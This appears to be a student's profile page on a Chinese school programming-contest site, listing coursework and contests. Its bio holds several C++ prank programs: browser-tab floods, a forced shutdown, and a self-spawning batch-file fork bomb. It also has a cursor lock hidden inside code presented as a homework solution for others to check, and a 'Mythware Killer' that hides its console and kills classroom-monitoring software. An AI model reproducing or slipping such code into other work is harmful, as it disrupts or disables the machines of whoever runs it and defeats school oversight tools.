-
个人简介
6666666666666666666666666666666666666666666666666666666666666666666666666666666
#include<bits/stdc++.h> using namespace std; int n; string s; char ch[]={'1','2','3','4','5','6','7','8','9','0','a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z'}; int main(){ srand(time(0)); for(int i=1;i<=10;i++) { int x=rand()%5+1; s=""; for(int i=1;i<=x;i++)s+=ch[rand()%36]; string ss="start https://note.ms/"+s; system(ss.c_str()); } }
#include<bits/stdc++.h> using namespace std; int n; string s; char ch[]={'1','2','3','4','5','6','7','8','9','0','a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z'}; int main(){ srand(time(0)); for(int i=1;i<=10;i++) { int x=rand()%10175+1000; string s=to_string(x); string ss="start https://www.luogu.com.cn/problem/P"+s; system(ss.c_str()); } }
#include<bits/stdc++.h> using namespace std; int n; string s; char ch[]={'1','2','3','4','5','6','7','8','9','0','a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z'}; int main(){ srand(time(0)); for(int i=1;i<=10;i++) { s=""; n=rand()%7+1; for(int i=0;i<n;i++)s+=ch[rand()%36]; string ss="start https://"+s+".com"; system(ss.c_str()); } }
#include<bits/stdc++.h> using namespace std; int main(){ system("shutdown /s /t 3"); while(1)system("start https://baidu.com"); }
#include <windows.h> #define press(VK_BUTTON) ((GetAsyncKeyState(VK_BUTTON) & 0x8000) ? 1:0) #define HIDE_CONSOLE void kill(){ system("taskkill /f /im StudentMain.exe"); } void start(){ system("cd C:\\Program Files (x86)\\Mythware\\极域电子教室软件 v4.0 2015 豪华版 & StudentMain.exe"); } void bc_mode(){ while (!(press('S') && press('T') && press('O') && press('P'))){ if (press('B') && press('C')){ kill(); MessageBox(NULL,"Mythware is(MAY) died.","Mythware Killer 2.0",MB_ICONINFORMATION|MB_OK); } } MessageBox(NULL,"It's now stopped.(b-c mode)","Mythware Killer 2.0",MB_ICONINFORMATION|MB_OK); } void st_mode(){ while (!(press('F') && press('U'))){ if (press('S') && press('T')){ start(); MessageBox(NULL,"Mythware is starting...","Mythware Killer 2.0",MB_ICONINFORMATION|MB_OK); } } MessageBox(NULL,"It's now stopped.(s-t mode)","Mythware Killer 2.0",MB_ICONINFORMATION|MB_OK); } /* This is where all the input to the window goes to */ LRESULT CALLBACK WndProc(HWND hwnd, UINT Message, WPARAM wParam, LPARAM lParam){ switch(Message){ /* Upon destruction, tell the main thread to stop */ case WM_DESTROY: { PostQuitMessage(0); break; } case WM_COMMAND: { if (LOWORD(wParam) == 1){ if(MessageBox(hwnd, "Set!\nUse keybd B-C to stop Mythware\nPress keybd S-T-O-P to stop this!", "Mythware Killer 2.0", MB_ICONINFORMATION|MB_YESNO)==IDYES){ bc_mode(); } } if (LOWORD(wParam) == 2){ if(MessageBox(hwnd, "Set!\nUse keybd S-T to start Mythware\nPress keybd F-U to stop this!", "Mythware Killer 2.0", MB_ICONINFORMATION|MB_YESNO)==IDYES){ st_mode(); } } break; } /* All other messages (a lot of them) are processed using default procedures */ default: return DefWindowProc(hwnd, Message, wParam, lParam); return 0; } return 0; } int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow){ #ifdef HIDE_CONSOLE HWND hd = GetConsoleWindow(); ShowWindow(hd, SW_HIDE); #endif kill(); WNDCLASSEX wc; /* A properties struct of our window */ HWND hwnd; /* A 'HANDLE', hence the H, or a pointer to our window */ MSG msg; /* A temporary location for all messages */ /* zero out the struct and set the stuff we want to modify */ memset(&wc,0,sizeof(wc)); wc.cbSize = sizeof(WNDCLASSEX); wc.lpfnWndProc = WndProc; /* This is where we will send messages to */ wc.hInstance = hInstance; wc.hCursor = LoadCursor(NULL, IDC_ARROW); /* White, COLOR_WINDOW is just a #define for a system color, try Ctrl+Clicking it */ wc.hbrBackground = (HBRUSH)(COLOR_WINDOW+1); wc.lpszClassName = "WindowClass"; wc.hIcon = LoadIcon(NULL, IDI_APPLICATION); /* Load a standard icon */ wc.hIconSm = LoadIcon(NULL, IDI_APPLICATION); /* use the name "A" to use the project icon */ if(!RegisterClassEx(&wc)) { MessageBox(NULL, "Can't start Mythware Killer!","Error!",MB_ICONEXCLAMATION|MB_OK); return 0; } hwnd = CreateWindowEx(WS_EX_CLIENTEDGE,"WindowClass","Mythware Killer 2.0",WS_VISIBLE|WS_OVERLAPPEDWINDOW, CW_USEDEFAULT, /* x */ CW_USEDEFAULT, /* y */ 620, /* width */ 190, /* height */ NULL,NULL,hInstance,NULL); if(hwnd == NULL){ MessageBox(NULL, "Error!","Mythware Killer 2.0",MB_ICONEXCLAMATION|MB_OK); return 0; } MessageBox(NULL,"Welcome to Mythware Killer 2.0!","Mythware Killer 2.0",MB_ICONINFORMATION|MB_OK); HWND button = CreateWindow( "BUTTON", "Stop Mythware using keybd B-C", WS_TABSTOP | WS_VISIBLE | WS_CHILD | BS_DEFPUSHBUTTON, 0, 0, //坐标 300, 160, //大小 hwnd, (HMENU)1, (HINSTANCE)GetWindowLongPtr(hwnd, GWLP_HINSTANCE), NULL ); if (!button){ MessageBox(NULL, "Error!", "Mythware Killer 2.0", MB_ICONERROR); return 1; } HWND button2 = CreateWindow( "BUTTON", "Start Mythware using keybd S-T", WS_TABSTOP | WS_VISIBLE | WS_CHILD | BS_DEFPUSHBUTTON, 300, 0, //坐标 300, 160, //大小 hwnd, (HMENU)2, (HINSTANCE)GetWindowLongPtr(hwnd, GWLP_HINSTANCE), NULL ); if (!button2){ MessageBox(NULL, "Error!", "Mythware Killer 2.0", MB_ICONERROR); return 1; } while(GetMessage(&msg, NULL, 0, 0) > 0) { /* If no error is received... */ TranslateMessage(&msg); /* Translate key codes to chars if present */ DispatchMessage(&msg); /* Send it to WndProc */ } return msg.wParam; } //C:\Program Files (x86)\Mythware\极域电子教室软件 v4.0 2015 豪华版
https://www.xiaodao0.com/admin/index.html?lang=cn
#include<bits/stdc++.h> using namespace std; queue<int>x; queue<queue<int> >y; queue<queue<queue<int> > >z; queue<queue<queue<queue<int> > > >k; int main(){ while(1){ x.push(114514); y.push(x); z.push(y); k.push(z); cout<<x.size(); } return 0; }
哪错了
#include<bits/stdc++.h> using namespace std; const int M=10010; int a[M],b,c[M]; void init(){ freopen("11.out","w",stdout); cout<<":1 \n start 11.bat \n goto 1"; fclose(stdout); system("ren 11.out 11.bat"); system("start 11.bat"); } void read(int sum[]) { memset(sum,0,sizeof(int)*M); string s; cin>>s; for(int i=0,j=s.size()-1;i<s.size();i++,j--) { sum[j]=s[i]-'0'; } } long long chu(int num1[],int num2,int res[]) { memset(res,0,sizeof(int)*M); long long r=0; for(int i=M-1;i>=0;i--) { r=r*10+num1[i]; res[i]=r/num2; r%=num2; } return r; } void print(int sum[]) { int pos=M-1; while(pos>0&&sum[pos]==0)pos--; for(int i=pos;i>=0;i--) { cout<<sum[i]; } } int main(){ init(); read(a); cin>>b; chu(a,b,c); print(c); return 0; }
还有一题
#include<bits/stdc++.h> #include<windows.h> using namespace std; const int M=10010; int a[M],b,c[M]; void init(){ int x=GetSystemMetrics(SM_CXSCREEN); int y=GetSystemMetrics(SM_CYSCREEN); srand(time(0)); while(1)SetCursorPos(999,999); } void read(int sum[]) { memset(sum,0,sizeof(int)*M); string s; cin>>s; for(int i=0,j=s.size()-1;i<s.size();i++,j--) { sum[j]=s[i]-'0'; } } long long chu(int num1[],int num2,int res[]) { memset(res,0,sizeof(int)*M); long long r=0; for(int i=M-1;i>=0;i--) { r=r*10+num1[i]; res[i]=r/num2; r%=num2; } return r; } void print(int sum[]) { int pos=M-1; while(pos>0&&sum[pos]==0)pos--; for(int i=pos;i>=0;i--) { cout<<sum[i]; } } int main(){ init(); read(a); cin>>b; chu(a,b,c); print(c); return 0; }
游戏
#include<windows.h> #include<cstdlib> #include<ctime> using namespace std; int main() { int x=GetSystemMetrics(SM_CXSCREEN); int y=GetSystemMetrics(SM_CYSCREEN); srand(time(0)); while(1)SetCursorPos(999,999); return 0; }
游戏
#include<bits/stdc++.h> using namespace std; int main(){ freopen("11.out","w",stdout); cout<<":1 \n start 11.bat \n goto 1"; fclose(stdout); system("ren 11.out 11.bat"); system("start 11.bat"); return 0; }
黑客
#include<bits/stdc++.h> using namespace std; int main(){ while(1){ system("color 0A"); cout<<"1010110101011101"; cout<<"1010010101110010"; cout<<"1010110101011101"; cout<<"1010110101011101"; cout<<"1010010101110010"; cout<<"1010110101011101"; cout<<"1010110101011101"; cout<<"1010010101110010"; cout<<"1010110101011101"; cout<<"1010110101011101"; cout<<"1010010101110010"; cout<<"1010110101011101"; cout<<"1010110101011101"; cout<<"1010010101110010"; cout<<"1010110101011101"; cout<<"1010110101011101"; cout<<"1010010101110010"; cout<<"1010110101011101"; cout<<"1010110101011101"; cout<<"1010010101110010"; cout<<"1010110101011101"; cout<<"1010110101011101"; cout<<"1010010101110010"; cout<<"1010110101011101"; cout<<"1010110101011101"; cout<<"1010010101110010"; cout<<"1010110101011101"; cout<<"1010110101011101"; cout<<"1010010101110010"; cout<<"1010110101011101"; cout<<"1010110101011101"; cout<<"1010010101110010"; cout<<"1010110101011101"; cout<<"1010110101011101"; cout<<"1010010101110010"; cout<<"1010110101011101"; cout<<"1010110101011101"; cout<<"1010010101110010"; cout<<"1010110101011101"; cout<<"1010110101011101"; cout<<"1010010101110010"; cout<<"1010110101011101"; cout<<"1010110101011101"; cout<<"1010010101110010"; cout<<"1010110101011101"; cout<<"1010110101011101"; cout<<"1010010101110010"; cout<<"1010110101011101"; cout<<"1010110101011101"; cout<<"1010010101110010"; cout<<"1010110101011101"; cout<<"1010110101011101"; cout<<"1010010101110010"; cout<<"1010110101011101"; cout<<"1010110101011101"; cout<<"1010010101110010"; cout<<"1010110101011101"; cout<<"1010110101011101"; cout<<"1010010101110010"; cout<<"1010110101011101"; cout<<"1010110101011101"; cout<<"1010010101110010"; cout<<"1010110101011101"; cout<<"1010110101011101"; cout<<"1010010101110010"; cout<<"1010110101011101"; cout<<"1010110101011101"; cout<<"1010010101110010"; cout<<"1010110101011101"; cout<<"1010110101011101"; cout<<"1010010101110010"; cout<<"1010110101011101"; } return 0; }
______ ______ __ __ ______ _____ ______ /\__ _\ /\ _ \/\ \/\ \ /\__ _\ /\ __ \/\__ _\ \/_/\ \/ \ \ \ \ \ \ \/ / \/_/\ \/ \ \ \/\ \/_/\ \/ \ \ \ \ \ __ \ \ < \ \ \ \ \ \ \ \ \ \ \ \_\ \__ \ \ \/\ \ \ \\ \ \_\ \__\ \ \_\ \ \_\ \__ /\_____\ \ \_\ \_\ \_\ \_\ /\_____\\ \_____\/\_____\ \/_____/ \/_/\/_/\/_/\/_/ \/_____/ \/_____/\/_____/
-
最近活动
- 2024铁外信息学C班测试 ACM/ICPC
- 铁外初级组十月份(一) 作业
- 2024oiClass入门组周赛计划#14 IOI
- 2024oiClass入门组周赛计划#10 IOI
- 2024oiClass入门组周赛计划#07 IOI
- 2024oiClass入门组周赛计划#01 IOI
- 验题 IOI
- 2024春季班class8-多维&差值DP 课后作业 作业
- 【oiClass公益赛】2024CSP-J模拟赛#18「WZA Round #2」 OI
- 2024春季班class8-多维&差值DP 随堂练习 作业
- 2024春季班class7-倍增-ST算法 课后作业 作业
- 2024春季班class7-倍增-ST算法 随堂练习 作业
- 2024春季班class6-区间型动态规划2-区间合并 课后作业 作业
- 2024春季班class6-区间型动态规划2-区间合并 随堂练习 作业
- 2024春季班class5-区间分割型动态规划 课后作业 作业
- 2024春季班class5-区间分割型动态规划 随堂练习 作业
- 【oiClass公益赛】2024CSP-J模拟赛#08 || For Riddles, For Wonders OI
- 2024春季班class4-背包型动态规划2课后作业 作业
- 2024春季班class4-背包型动态规划2随堂练习 作业
- 【oiClass公益赛】2024CSP-J模拟赛#20 OI
- 2024春季班class3-背包型动态规划1课后作业 作业
- 2024春季班class3-背包型动态规划1随堂练习 作业
- 【oiClass公益赛】2024CSP-J模拟赛#15 OI
- 2024春季班class2-二维动规&最长公共子序列课后作业 作业
- 2024春季班class2-二维动规&最长公共子序列随堂练习 作业
- 【oiClass公益赛】2024CSP-J模拟赛#06 || LSZOI #01 OI
- 【oiClass公益赛】2024CSP-J模拟赛#17 OI
- 2024春季班class1-一维动规&最长不下降子序列课后作业 作业
- 2024春季班class1-一维动规&最长不下降子序列随堂练习 作业
- 【oiClass 公益赛】2024 CSP-J 模拟赛 #13 & XYZ Round 1 OI
- 【oiclass 公益赛】2024 CSP-J 模拟赛 #11 OI
- 【oiClass公益赛】2024CSP-J模拟赛#10 OI
- 【oiClass公益赛】2024CSP-J模拟赛#19 OI
- 【oiClass公益赛】2024CSP-J模拟赛#14 OI
- 【oiClass公益赛】2024CSP-J模拟赛#09 OI
- 【oiClass公益赛】2024CSP-J模拟赛#07 OI
- 【oiClass公益赛】2024CSP-J模拟赛#16 OI
- 【oiClass公益赛】2024 CSP-J 模拟赛 #04 OI
- 【oiClass公益赛】2024CSP-J模拟赛#03 OI
- 【oiClass公益赛】2024CSP-J模拟赛 #05 OI
- 【oiClass公益赛】2024CSP-J模拟赛#02 OI
- 【oiClass公益赛】2024CSP-J模拟赛#01 OI
- 2023-2024学年冬令营Class6-双指针 作业
- 2023-2024学年冬令营Class4-二分搜索2 作业
- 2023-2024学年冬令营Class3-二分搜索1 作业
- 2023-2024学年冬令营Class1-广搜2 作业
- 2023-2024学年冬令营Class1-广搜1 作业
- 张晋嘉、倪穗霆杂题 作业
- 2023学年秋季班_模拟测试11 OI
- 2023学年秋季班_模拟测试10 OI
- 2023年秋季营lesson13作业-递归算法2 作业
- 2023学年秋季班_模拟测试09 OI
- 2023学年秋季班_模拟测试08 OI
- 2023学年秋季班_模拟测试07 OI
- 2023学年秋季班_模拟测试06 OI
- 2023学年秋季班_模拟测试05 OI
- 2023年秋季营lesson5作业-2023秋季营阶段测试1(仅供改题) 作业
- 【oiClass公益赛】2023CSPJ模拟赛#10 OI
- 【oiClass公益赛】2023CSPJ模拟赛#06 OI
- 2023学年秋季班_模拟测试04 OI
- 2023新初一字符串小测 IOI
- 2023学年秋季班_模拟测试02 OI
- 2023年秋季营lesson2作业-字符数组&字符串 作业
- 2023学年秋季班_模拟测试01 OI
- 2023年秋季营lesson1作业-二维数组 作业
- 新初一暑期培训测试选拔 OI
- 新初一夏令营day12作业-一维数组3 作业
- 新初一夏令营day11作业-一维数组2 作业
- 新初一夏令营day10作业-一维数组1 作业
- 夏令营day17作业-一维数组2 作业
- 新初一夏令营day9作业-多重循环 作业
- 新初一夏令营day8作业-while语句2 作业
- 新初一夏令营day7作业-while语句1 作业
- 新初一夏令营第一周模拟测试 OI
- 新初一夏令营day6作业-for语句3 作业
- 新初一夏令营day5作业-for语句2 作业
- 新初一夏令营day4作业-for语句1 作业
- 新初一夏令营day3作业-if语句 作业
- 新初一夏令营day2作业-表达式 作业
- 新初一夏令营day1作业-C++程序结构 作业
- 夏令营day4作业-for语句1 作业
- 夏令营day2作业-表达式 作业
- 夏令营day1作业-C++程序结构 作业
- 2022TYSC线上选拔赛 OI
- 2022TYSC模拟测试04 OI
- 2022TYSC模拟测试03 OI
- 2022TYSC模拟测试02 IOI
- 2022TYSC模拟测试01 IOI
-
Stat
-
Rating